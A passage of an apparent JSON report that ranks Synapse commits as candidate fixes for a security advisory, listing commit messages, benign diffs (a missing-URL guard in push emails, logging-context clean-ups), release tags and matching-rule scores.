"v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8952, 8952", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: write, file", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8952", + "relevance": 2 + } + ] + }, + { + "commit_id": "7a332850e6fea9585ac440a76a827e7a93663d89", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608130406, + "hunks": 0, + "message": "Merge pull request #8951 from matrix-org/rav/username_picker_2 More preparatory refactoring of the OidcHandler tests", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8951": "Implement a username picker for synapse #8942" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8951, 8951", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: request", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8951", + "relevance": 2 + } + ] + }, + { + "commit_id": "3e8292d48324d329c188d0125cdec4020ddc39ff", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607529792, + "hunks": 0, + "message": "Merge pull request #8906 from matrix-org/rav/fix_multiarch_builds Pin the docker version for multiarch builds", + "diff": [], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8906": "Missing arm64 and armv7 docker builds #8907" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8906, 8906", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: request, version", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8906", + "relevance": 2 + } + ] + }, + { + "commit_id": "4136255d3cd733d3b9997f3f23a837d76cec7aaf", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608294375, + "hunks": 3, + "message": "Ensure that a URL exists in the content during push. (#8965) This fixes an KeyError exception, after this PR the content is just considered unknown.", + "diff": [ + "diff --git a/changelog.d/8965.bugfix b/changelog.d/8965.bugfix", + "new file mode 100644", + "index 000000000..cbccebddb", + "--- /dev/null", + "+++ b/changelog.d/8965.bugfix", + "@@ -0,0 +1 @@", + "+Fix a longstanding bug where a `m.image` event without a `url` would cause errors on push.", + "diff --git a/synapse/push/mailer.py b/synapse/push/mailer.py", + "index 9ff092e8b..4d875dcb9 100644", + "--- a/synapse/push/mailer.py", + "+++ b/synapse/push/mailer.py", + "@@ -488,3 +488,7 @@ class Mailer:", + " ) -> None:", + "- messagevars[\"image_url\"] = event.content[\"url\"]", + "+ \"\"\"", + "+ Potentially add an image URL to the message variables.", + "+ \"\"\"", + "+ if \"url\" in event.content:", + "+ messagevars[\"image_url\"] = event.content[\"url\"]", + "diff --git a/synapse/res/templates/notif.html b/synapse/res/templates/notif.html", + "index 6d76064d1..0aaef97df 100644", + "--- a/synapse/res/templates/notif.html", + "+++ b/synapse/res/templates/notif.html", + "@@ -31,3 +31,3 @@", + " {{ message.body_text_html }}", + "- {%- elif message.msgtype == \"m.image\" %}", + "+ {%- elif message.msgtype == \"m.image\" and message.image_url %}", + " " + ], + "changed_files": [ + "changelog.d/8965.bugfix", + "synapse/push/mailer.py", + "synapse/res/templates/notif.html" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8965": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8965, 8965", + "relevance": 32 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: know", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8965", + "relevance": 2 + } + ] + }, + { + "commit_id": "1619802228033455ff6e5863c52556996b38e8c6", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607973587, + "hunks": 22, + "message": "Various clean-ups to the logging context code (#8935)", + "diff": [ + "diff --git a/changelog.d/8916.misc b/changelog.d/8916.misc", + "index c71ef480e..bf94135fd 100644", + "--- a/changelog.d/8916.misc", + "+++ b/changelog.d/8916.misc", + "@@ -1 +1 @@", + "-Improve structured logging tests.", + "+Various clean-ups to the structured logging and logging context code.", + "diff --git a/changelog.d/8935.misc b/changelog.d/8935.misc", + "new file mode 100644", + "index 000000000..bf94135fd", + "--- /dev/null", + "+++ b/changelog.d/8935.misc", + "@@ -0,0 +1 @@", + "+Various clean-ups to the structured logging and logging context code.", + "diff --git a/synapse/config/logger.py b/synapse/config/logger.py", + "index d4e887a3e..4df3f93c1 100644", + "--- a/synapse/config/logger.py", + "+++ b/synapse/config/logger.py", + "@@ -208,3 +208,3 @@ def _setup_stdlib_logging(config, log_config_path, logBeginner: LogBeginner) ->", + "- log_context_filter = LoggingContextFilter(request=\"\")", + "+ log_context_filter = LoggingContextFilter()", + " log_metadata_filter = MetadataFilter({\"server_name\": config.server_name})", + "diff --git a/synapse/http/site.py b/synapse/http/site.py", + "index 5f0581dc3..5a5790831 100644", + "--- a/synapse/http/site.py", + "+++ b/synapse/http/site.py", + "@@ -130,4 +130,3 @@ class SynapseRequest(Request):", + " request_id = self.get_request_id()", + "- logcontext = self.logcontext = LoggingContext(request_id)", + "- logcontext.request = request_id", + "+ self.logcontext = LoggingContext(request_id, request=request_id)", + "diff --git a/synapse/logging/context.py b/synapse/logging/context.py", + "index ca0c774cc..a507a83e9 100644", + "--- a/synapse/logging/context.py", + "+++ b/synapse/logging/context.py", + "@@ -205,6 +205,2 @@ class _Sentinel:", + "- def copy_to_twisted_log_entry(self, record):", + "- record[\"request\"] = None", + "- record[\"scope\"] = None", + "-", + " def start(self, rusage: \"Optional[resource._RUsage]\"):", + "@@ -374,9 +370,2 @@ class LoggingContext:", + "- def copy_to_twisted_log_entry(self, record) -> None:", + "- \"\"\"", + "- Copy logging fields from this context to a Twisted log record.", + "- \"\"\"", + "- record[\"request\"] = self.request", + "- record[\"scope\"] = self.scope", + "-", + " def start(self, rusage: \"Optional[resource._RUsage]\") -> None:", + "@@ -544,9 +533,6 @@ class LoggingContextFilter(logging.Filter):", + " record.", + "- Args:", + "- **defaults: Default values to avoid formatters complaining about", + "- missing fields", + " \"\"\"", + "- def __init__(self, **defaults) -> None:", + "- self.defaults = defaults", + "+ def __init__(self, request: str = \"\"):", + "+ self._default_request = request", + "@@ -558,4 +544,3 @@ class LoggingContextFilter(logging.Filter):", + " context = current_context()", + "- for key, value in self.defaults.items():", + "- setattr(record, key, value)", + "+ record.request = self._default_request", + "@@ -565,3 +550,4 @@ class LoggingContextFilter(logging.Filter):", + " if context is not None:", + "- context.copy_to(record)", + "+ # Logging is interested in the request.", + "+ record.request = context.request", + "diff --git a/synapse/metrics/background_process_metrics.py b/synapse/metrics/background_process_metrics.py", + "index 76b7decf2..70e0fa45d 100644", + "--- a/synapse/metrics/background_process_metrics.py", + "+++ b/synapse/metrics/background_process_metrics.py", + "@@ -201,4 +201,3 @@ def run_as_background_process(desc: str, func, *args, bg_start_span=True, **kwar", + "- with BackgroundProcessLoggingContext(desc) as context:", + "- context.request = \"%s-%i\" % (desc, count)", + "+ with BackgroundProcessLoggingContext(desc, \"%s-%i\" % (desc, count)) as context:", + " try:", + "@@ -246,4 +245,4 @@ class BackgroundProcessLoggingContext(LoggingContext):", + "- def __init__(self, name: str):", + "- super().__init__(name)", + "+ def __init__(self, name: str, request: Optional[str] = None):", + "+ super().__init__(name, request=request)", + "diff --git a/synapse/replication/tcp/protocol.py b/synapse/replication/tcp/protocol.py", + "index a509e599c..804da994e 100644", + "--- a/synapse/replication/tcp/protocol.py", + "+++ b/synapse/replication/tcp/protocol.py", + "@@ -174,4 +174,3 @@ class BaseReplicationStreamProtocol(LineOnlyReceiver):", + " ctx_name = \"replication-conn-%s\" % self.conn_id", + "- self._logging_context = BackgroundProcessLoggingContext(ctx_name)", + "- self._logging_context.request = ctx_name", + "+ self._logging_context = BackgroundProcessLoggingContext(ctx_name, ctx_name)", + "diff --git a/tests/handlers/test_federation.py b/tests/handlers/test_federation.py", + "index d0452e149..0b24b89a2 100644", + "--- a/tests/handlers/test_federation.py", + "+++ b/tests/handlers/test_federation.py", + "@@ -128,3 +128,3 @@ class FederationTestCase(unittest.HomeserverTestCase):", + "- with LoggingContext(request=\"send_rejected\"):", + "+ with LoggingContext(\"send_rejected\"):", + " d = run_in_background(self.handler.on_receive_pdu, OTHER_SERVER, ev)", + "@@ -180,3 +180,3 @@ class FederationTestCase(unittest.HomeserverTestCase):", + "- with LoggingContext(request=\"send_rejected\"):", + "+ with LoggingContext(\"send_rejected\"):", + " d = run_in_background(self.handler.on_receive_pdu, OTHER_SERVER, ev)", + "@@ -200,3 +200,3 @@ class FederationTestCase(unittest.HomeserverTestCase):", + " join_event.signatures[other_server] = {\"x\": \"y\"}", + "- with LoggingContext(request=\"send_join\"):", + "+ with LoggingContext(\"send_join\"):", + " d = run_in_background(", + "diff --git a/tests/logging/test_terse_json.py b/tests/logging/test_terse_json.py", + "index f6e7e5fda..48a74e2ee 100644", + "--- a/tests/logging/test_terse_json.py", + "+++ b/tests/logging/test_terse_json.py", + "@@ -119,7 +119,6 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " handler.setFormatter(JsonFormatter())", + "- handler.addFilter(LoggingContextFilter(request=\"\"))", + "+ handler.addFilter(LoggingContextFilter())", + " logger = self.get_logger(handler)", + "- with LoggingContext() as context_one:", + "- context_one.request = \"test\"", + "+ with LoggingContext(request=\"test\"):", + " logger.info(\"Hello there, %s!\", \"wally\")", + "@@ -134,3 +133,2 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " \"request\",", + "- \"scope\",", + " ]", + "@@ -139,2 +137 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", + " self.assertEqual(log[\"request\"], \"test\")", + "- self.assertIsNone(log[\"scope\"])", + "diff --git a/tests/test_federation.py b/tests/test_federation.py", + "index fa45f8b3b..fc9aab32d 100644", + "--- a/tests/test_federation.py", + "+++ b/tests/test_federation.py", + "@@ -136,3 +136,3 @@ class MessageAcceptTests(unittest.HomeserverTestCase):", + "- with LoggingContext(request=\"lying_event\"):", + "+ with LoggingContext():", + " failure = self.get_failure(", + "diff --git a/tests/test_utils/logging_setup.py b/tests/test_utils/logging_setup.py", + "index fdfb840b6..52ae5c571 100644", + "--- a/tests/test_utils/logging_setup.py", + "+++ b/tests/test_utils/logging_setup.py", + "@@ -50,3 +50,3 @@ def setup_logging():", + " handler.setFormatter(formatter)", + "- handler.addFilter(LoggingContextFilter(request=\"\"))", + "+ handler.addFilter(LoggingContextFilter())", + " root_logger.addHandler(handler)" + ], + "changed_files": [ + "changelog.d/8916.misc", + "changelog.d/8935.misc", + "synapse/config/logger.py", + "synapse/http/site.py", + "synapse/logging/context.py", + "synapse/metrics/background_process_metrics.py", + "synapse/replication/tcp/protocol.py", + "tests/handlers/test_federation.py", + "tests/logging/test_terse_json.py", + "tests/test_federation.py", + "tests/test_utils/logging_setup.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8935": "Add type hints to the logging context code. #8939 Regression in log context tracking #9048" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + 